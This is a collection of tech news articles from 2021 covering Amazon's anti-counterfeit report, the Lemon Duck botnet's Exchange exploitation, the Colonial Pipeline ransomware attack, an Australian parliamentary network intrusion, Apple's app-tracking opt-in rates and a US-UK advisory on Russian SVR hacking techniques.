Information Technology

Amazon’s crusade against counterfeit product sellers on the firm’s platform continues with two million products seized and destroyed in 2020. 

The e-commerce giant, known for shopping events such as Prime Day, allows third-party sellers across the globe to tout their wares on the Amazon platform. However, it takes only a brief glance at some products to know there are issues. Fake, counterfeit products, poor quality, misleading photos, and more are all noted in buyer reviews and there are vast numbers of counterfeit operations that Amazon is attempting to detect and remove.  While some sellers abuse the platform in colorful ways — such as the case of an Instagram influencer who was shut down after allegedly selling dupes with pictures of generic products in the marketplace — others continue to trade without detection.  However, Amazon wants to bring down “counterfeit to zero” on the platform and to benchmark the firm’s progress has released its first Brand Protection Report (.PDF) to the public.  According to the report, which documents anti-counterfeit activities during 2020, there have been “increased attempts by bad actors to commit fraud and offer counterfeit products,” leading to the seizure of millions of products sent to fulfillment centers which were then destroyed.  “Amazon destroyed those products to prevent them from being resold elsewhere in the supply chain,” the company says. 

The e-commerce giant added that over 10 billion “suspect” listings were blocked before being published, and over six million attempts to create seller accounts suspected of being involved in counterfeit operations were prevented.  When it comes to brands being impersonated by counterfeit sellers, Amazon says that less than 0.01% of products sold received an allegation from a customer of being fake, and in these cases, over 7,000 SMBs were connected via Amazon’s Counterfeit Crimes Unit to legal teams in the US and Europe.  Over $700 million was invested in 2020 to combat counterfeit product operations.  “Amazon continues to innovate on its robust proactive controls and powerful tools for brands, and won’t rest until there are zero counterfeits in its store,” Amazon commented. “However, this is an escalating battle with criminals that continue to look for ways to sell counterfeits, and the only way to permanently stop these counterfeiters is to hold them accountable through the court system and criminal prosecution.” Another problem that likely gives Amazon a headache is the custom of unscrupulous sellers who pay customers to leave five-star reviews. A data leak earlier this month implicated approximately 200,000 individuals in a review scam — potentially originating from China — in which sellers ‘refund’ a product’s price once a glowing review is left on the item’s Amazon listing.  In response, the company said, “we suspend, ban, and take legal action against those who violate [community and review] policies.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Researchers have explored the latest activities of the Lemon Duck hacking group, including the leverage of Microsoft Exchange Server vulnerabilities and the use of decoy top-level domains. 

The active exploit of zero-day Microsoft Exchange Server vulnerabilities in the wild was a security disaster for thousands of organizations. Four critical flaws, dubbed ProxyLogon, impact on-prem Microsoft Exchange Server 2013, 2016, and 2010. Patches, vulnerability detection tools, and mitigation instructions were made available in March, but it is still estimated that up to 60,000 organizations may have been compromised.  Exploit code, too, is now available, and at least 10 advanced persistent threat (APT) groups have adopted the flaws in attacks this year.  In late March, Microsoft said the Lemon Duck botnet had been observed exploiting vulnerable servers and using the systems to mine for cryptocurrency. Now, researchers from Cisco Talos have provided a deep dive into the cyberattackers’ current tactics.  Lemon Duck operators are incorporating new tools to “maximize the effectiveness of their campaigns” by targeting the high-severity vulnerabilities in Microsoft Exchange Server and telemetry data following DNS queries to Lemon Duck domains indicates that campaign activity spiked in April.  

The majority of queries came from the US, followed by Europe and South East Asia. A substantial spike in queries to one Lemon Duck domain was also noted in India.  Lemon Duck operators use automated tools to scan, detect, and exploit servers before loading payloads such as Cobalt Strike DNS beacons and web shells, leading to the execution of cryptocurrency mining software and additional malware.  The malware and associated PowerShell scripts will also attempt to remove antivirus products offered by vendors such as ESET and Kaspersky and will stop any services — including Windows Update and Windows Defender — that could hamper an infection attempt.  Scheduled tasks are created to maintain persistence, and in recent campaigns, the CertUtil command-line program is utilized to download two new PowerShell scripts that are tasked with the removal of AV products, creating persistence routines, and downloading a variant of the XMRig cryptocurrency miner.  Competing cryptocurrency miner signatures, too, are hardcoded and written up in a “killer” module for deletion.  SMBGhost and Eternal Blue have been used in past campaigns, but as the leverage of Microsoft Exchange Server flaws shows, the group’s tactics are constantly changing to stay ahead of the curve.  Lemon Duck has also been creating decoy top-level domains (TLDs) for China, Japan, and South Korea to try and obfuscate command-and-control (C2) center infrastructure. “Considering these ccTLDs are most commonly used for websites in their respective countries and languages, it is also interesting that they were used, rather than more generic and globally used TLDs such as “.com” or “.net,” Cisco Talos notes. “This may allow the threat actor to more effectively hide C2 communications among other web traffic present in victim environments.” Overlaps between the Lemon Duck botnet and Beapy/Pcastle cryptocurrency malware have also been observed.  “The use of new tools like Cobalt Strike, as well as the implementation of additional obfuscation techniques throughout the attack lifecycle, may enable them to operate more effectively for longer periods within victim environments,” the researchers say. “New TTPs consistent with those reportedly related to widespread exploitation of high-profile Microsoft Exchange software vulnerabilities, and additional host-based evidence suggest that this threat actor is also now showing a specific interest in targeting Exchange Servers as they attempt to compromise additional systems and maintain and/or increase the number of systems within the Lemon Duck botnet.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

The US Department of Transportation (USDOT) has invoked emergency powers in response to the Colonial Pipeline ransomware attack in order to make it easier to transport fuel by road.The ransomware attack, disclosed late last week, impacted the pipeline company, which is responsible for supplying 45% of the East Coast’s fuel, including gasoline, diesel, jet fuel, home-heating oil, and fuel for the US military.

Colonial said it is developing a system restart plan and said that while its mainlines remain offline, some smaller lateral lines between terminals and delivery points are now operational. SEE: Security Awareness and Training policy (TechRepublic Premium)”Quickly after learning of the attack, Colonial proactively took certain systems offline to contain the threat. These actions temporarily halted all pipeline operations and affected some of our IT systems, which we are actively in the process of restoring,” the company said. In the meantime, the USDOT’s Federal Motor Carrier Safety Administration (FMCSA) has issued a Regional Emergency Declaration – temporary exemptions involving laws restricting road transport of fuel, and allows drivers to work for longer.The exemptions apply to vehicles transporting gasoline, diesel, jet fuel and other refined petroleum products to Alabama, Arkansas, District of Columbia, Delaware, Florida, Georgia, Kentucky, Louisiana, Maryland, Mississippi, New Jersey, New York, North Carolina, Pennsylvania, South Carolina, Tennessee, Texas, and Virginia.

“Such emergency is in response to the unanticipated shutdown of the Colonial pipeline system due to network issues that affect the supply of gasoline, diesel, jet fuel, and other refined petroleum products throughout the affected states,” FMCSA said in a statement.  Cybersecurity experts told Reuters today that the ransomware group DarkSide is suspected to have carried out the attack on Colonial Pipeline. Darkside runs a ransomware-as-a-service business that other cybercrime groups can rent. It’s been active since mid-2020 and although a decryptor was released in January, security firm Cyber Reason noted that the group recently released DarkSide 2.0. The group is known for encrypting, as well as stealing, some data and using the threat of its exposure on the internet as leverage for the victim to pay ransoms.SEE: Ransomware just got very real. And it’s likely to get worseFMCSA’s exemption is aimed at providing commercial tanker operators regulatory relief while directly supporting emergency efforts to patch up fuel supply shortages “due to the shutdown, partial shutdown, and/or manual operation of the Colonial pipeline system”.The shutdown of Colonial Pipeline might impact fuel prices depending on the length of the disruption. Gaurav Sharma, an independent oil market analyst, told the BBC that a lot of fuel is banking up at Texas refineries.”Unless they sort it out by Tuesday, they’re in big trouble,” said Sharma. “The first areas to be impacted would be Atlanta and Tennessee, then the domino effect goes up to New York.”  Colonial Pipeline confirmed on Sunday it was the victim of ransomware and said it had engaged an external cybersecurity firm to assist with its recovery effort.  More

Image: Asha Barbaschow/ZDNet
The Australian Department of Parliamentary Services has said its March outage was a result of a “deliberate choice” to shut down its mobile device management (MDM) system after it saw an attempted intrusion on the parliamentary network. “The attack did not cause an outage of the DPS systems. DPS shut down the MDM system. This action was taken to protect system security while investigation and remediation were undertaken,” DPS said in response to Senate Estimates Questions on Notice. “To restore services, DPS brought forward the rollout of an advanced mobile services solution that replaced the legacy MDM. The new solution provides greater security and functionality for mobile devices. This rollout was a complex activity and extended the outage experienced by users.” Nevertheless, DPS also said the legacy MDM system was still being used in a limited capacity. “DPS took two paths to restore services to PCN mobile devices. For some users it was possible to restore services using the legacy MDM in a limited capacity,” it said. “These users were utilising a component of the legacy MDM that did not contain vulnerabilities.” It added the MDM replacement had been piloted for three months leading up to the incident, and hence why the introduction of the planned replacement was able to be brought forward. The department added it had seen no evidence of any email accounts being compromised due to the attack, and the attack had nothing to do with recent Exchange vulnerabilities.

DPS said the Senate President would provide further information and “material not appropriately disclosed in the public domain” to the Senate Appropriations, Staffing and Security Committee. In response to another question asking DPS to list all outages impacting connectivity and email from the 2019-20 fiscal year to the present, the department said answering was not appropriate. Last month, ASIO Director-General Mike Burgess said he was not concerned by the outage. “As the director of security, I’m not concerned, by what I’ve seen,” he said. “From my point of view of, ‘Is espionage or cyber espionage being occurred?’ I’m not concerned by that incident. “Of course, in the broad, any network connected to the internet is subject to that frequently and the levels of cyber espionage attempts in this country are pretty high, so I remain concerned about that and through the actions of others, the [Australian Cyber Security Centre] that is dealing with the terms of that outage, I am not concerned. Related Coverage More

Image: Flurry Analytics
Apple’s app tracking transparency tool, which lets users decide whether they agree to their data being tracked, began rolling out as part of iOS 14.5 last month.The feature requires apps to get users’ permission before tracking their data across other companies’ apps or websites for advertising purposes. When asked by users not to track their data, apps will also have to refrain from sharing information with data brokers. But when given the choice, many users are denying permission for apps to gather tracking data.In a report from Verizon Media-owned Flurry Analytics, only 13% of global iOS users have allowed apps to track by the second week of the feature being enabled.As first spotted by Apple Insider, only around 5% of daily users in the United States by week two were allowing tracking.The Flurry report was compiled from aggregated insights across 2 billion mobile devices. It updates daily and ZDNet last accessed the data on Monday, 10 May 2021 at 9:30am AEST.It also found that there are around 5% of iOS users with “restricted” app tracking, meaning apps cannot ask those users to be tracked. This figure is 3% in the US.

If users select “Ask app not to track”, the app developer won’t be given access to the device’s advertising identifier, which is often used to collect advertising data; and apps that continue to track users that have opted out run the risk of being evicted from the App Store altogether. READ MOREApple’s new privacy tool lets you choose which apps can see and share your data. Here’s what you need to knowThe Cupertino giant has announced a new privacy feature coming next spring, which will let users make their own data choices.Apple now shows you all the ways iOS apps track youAnd for some apps, it’s quite scary.Apple’s new privacy feature will change the web. And not everyone is happy about itWith iOS 14.5, Apple has introduced some new privacy features that will limit targeted advertising. More

There’s just been another ransomware attack, but this one could have more significant consequences than the many that have come before.

Late last week, Colonial Pipeline, which accounts for 45% of the US East Coast’s fuel, was forced to shut down its operations due to a ransomware attack against its systems.Even President Biden was briefed on in the incident; it doesn’t get much more high profile than that. SEE: Security Awareness and Training policy (TechRepublic Premium)So will such a significant incident lead to changes in how ransomware is tackled? Possibly, but it’s worth remembering that there have been plenty of damaging and high-profile ransomware attacks across both the US, and elsewhere, without police or governments coming up with a way of tackling these gangs. That’s largely because the ransomware problem is actually a knotty set of interconnected problems, all of which defy easy solutions.

Certainly many companies need to take cybersecurity more seriously, and vendors need to focus more on selling software that is secure, and not just rushing it out to customers and (maybe) fixing it later. But forcing companies to spend money on cybersecurity with no obvious return is hard; obliging software companies to fix every fault before they ship their software would bring the industry to a halt. Persuading police to take these cases seriously is another problem. Few forces have the expertise to tackle this sort of complicated investigation and, even if they did, tracking down the culprits is hard – and securing a conviction all but impossible. Many of these gangs operate from jurisdictions (such as Russia) that are very unlikely to hand over suspects for trial elsewhere.And every time a victim reluctantly pays the gangs, they are making the gangs stronger, and able to take on even more ambitious attacks, even against organisations that have invested in security. But the bigger issue is that, as we connect more and more systems to the internet, the real world becomes more at risk of threats like this, that until now have only ever been a problem for the online world. That may focus the attention of governments and police a little more. If a ransomware attack means your company loses the sales data held on a few servers, no one – apart from you and your boss – is going to be too upset. But say those servers were running the traffic lights on a busy stretch of road, or running the x-ray machines at the local hospital – then the attack has a real-world impact.The growth of interest in smart cities is one example of how this threat could evolve. The idea behind smart cities is that by using data better we can run cities more effectively and efficiently. In practice that means using all manner of sensors and Internet of Things devices to collect information and automate processes.  But unless this is done with security in mind, it means that when the technology goes wrong, we could have big problems. As the UK’s cybersecurity agency the NCSC points out: “While smart cities offer significant benefits to citizens, they are also potential targets for cyberattacks due to the critical functions they provide and sensitive data they process, often in large volumes. The compromise of a single system in a smart city could potentially have a negative impact across the network, if badly designed.”Any sort of security threat to smart cities could be a problem, but ransomware seems to be the leading candidate for causing chaos right now.SEE: Hackers are actively targeting flaws in these VPN devices. Here’s what you need to doSo will anything really change any time soon? Well, having your activities brought to the attention of the President of the United States is never a good idea, if ransomware gangs have themselves courted publicity for their attacks in the past as a way of putting pressure on their victims. Such a high-profile incident might put a bit of momentum behind efforts to tackle the problem.If more funds are made available to improve the security of creaking but vital infrastructure, that will be a step in the right direction. Making it harder or even banning the payment of ransoms in this context would certainly bring short-term pain for victims but may in the longer term be a way of reducing attacks, too. Of all the complicated problems that have allowed ransomware to flourish, it could be that the geopolitical challenge is one of the toughest to overcome. Sanctions and indictments have done little so far to stop the flood of attacks. But if the nations that still allow these gangs to operate could be persuaded that it’s no longer in their interests to let them do so, that could change the situation hugely.Still, for now it’s hard to see that the threat of ransomware is going to go away any time soon. Even worse, as we put computers in charge of more of the real world around us, the problem is only likely to get worse.ZDNET’S MONDAY MORNING OPENER The Monday Morning Opener is our opening salvo for the week in tech. Since we run a global site, this editorial publishes on Monday at 8:00am AEST in Sydney, Australia, which is 6:00pm Eastern Time on Sunday in the US. It is written by a member of ZDNet’s global editorial board, which is comprised of our lead editors across Asia, Australia, Europe, and North America.PREVIOUSLY ON MONDAY MORNING OPENER: More

Colonial Pipeline, which accounts for 45% of the East Coast’s fuel, said it has shut down its operations due to a cyberattack.The attack highlights how ransomware and other cyberattacks are increasingly a threat to real-world infrastructure. The company delivers refined petroleum products such as gasoline, diesel, jet fuel, home heating oil and fuel for the U.S. Military. What is cyber insurance? Everything you need to know about what it covers and how it works | Best cyber insurance 2021In a statement, Colonial Pipeline said:On May 7, the Colonial Pipeline Company learned it was the victim of a cybersecurity attack. In response, we proactively took certain systems offline to contain the threat, which has temporarily halted all pipeline operations, and affected some of our IT systems. Upon learning of the issue, a leading, third-party cybersecurity firm was engaged, and they have already launched an investigation into the nature and scope of this incident, which is ongoing. We have contacted law enforcement and other federal agencies. Colonial Pipeline is taking steps to understand and resolve this issue. At this time, our primary focus is the safe and efficient restoration of our service and our efforts to return to normal operation. This process is already underway, and we are working diligently to address this matter and to minimize disruption to our customers and those who rely on Colonial Pipeline.Cybersecurity: Let’s get tactical | A Winning Strategy for Cybersecurity | Cyberwar and the Future of Cybersecurity Here’s a look at the Colonial Pipeline system affected by the cyberattack.Colonial Pipeline’s shutdown should it continue may lead to supply shortages since it covers so much territory in the US. More

Russian cyber attacks are being deployed with new techniques – including exploiting vulnerabilities like the recent Microsoft Exchange zero-days – as its hackers continue to target governments, organisations and energy providers around the world.A joint advisory by, the US Department for Homeland Security’s Cybersecurity Infrastructure Security Agency (CISA), FBI and the National Security Agency (NSA),as well as the UK National Cyber Security Centre looks to warn organisations about updated Tactics, Techniques and Procedures (TTPs) used by Russia’s foreign intelligence service, the SVR – a group also known by cybersecurity researchers as APT29, Cozy Bear, and The Dukes. It comes after cybersecurity agencies in the US and the UK attributed the SolarWinds attack to Russia’s civilian foreign intelligence service, as well as several campaigns targeting Covid-19 vaccine developers. “The SVR is a technologically sophisticated and highly capable cyber actor. It has developed capabilities to target organisations globally, including in the UK, US, Europe, NATO member states and Russia’s neighbours,” said the alert.The advisory warns that Russian cyber attackers have updated their techniques and procedures in an effort to infiltrate networks and avoid detection, especially when some organisations have attempted to adjust their defences after previous alerts about cyber threats.This includes the attackers using open source tool Sliver as a means of maintaining access to compromised networks and making use of numerous vulnerabilities, including vulnerabilities in Microsoft Exchange.Sliver is an open source red team tool, a tool used by penetration testers when legally and legitimately testing network security, but in this case is being abused to consolidate access to networks compromised with WellMess and WellMail, custom malware associated with SVR attacks.

SEE: Network security policy (TechRepublic Premium)Although the paper warns that this isn’t necessarily a full list, other vulnerabilities – all of which have security patches available – used by Russian attackers, include: CVE-2018-13379 FortiGateCVE-2019-1653 Cisco router CVE-2019-2725 Oracle WebLogic Server CVE-2019-9670 Zimbra CVE-2019-11510 Pulse Secure CVE-2019-19781 Citrix CVE-2019-7609 Kibana CVE-2020-4006 VMWare CVE-2020-5902 F5 Big-IP CVE-2020-14882 Oracle WebLogic CVE-2021-21972 VMWare vSphere The attackers are also targeting mail servers as part of their attacks as they’re useful staging posts to acquire administrator rights and the ability to further network information and access, be it for gaining a better understanding of the network, or a direct effort to steal information.But despite the often advanced nature of the attacks, the paper by US and UK cybersecurity authorities says that “following basic cyber security principles will make it harder for even sophisticated actors to compromise target networks”.This includes applying security patches promptly so no cyber attackers – cyber criminal or nation-state backed operative – can exploit known vulnerabilities as a means of entering or maintaining persistence on the network. Guidance by the NCSC also suggests using multi-factor authentication to help protect the network from attack, particularly if passwords have been compromised.MORE ON CYBERSECURITY More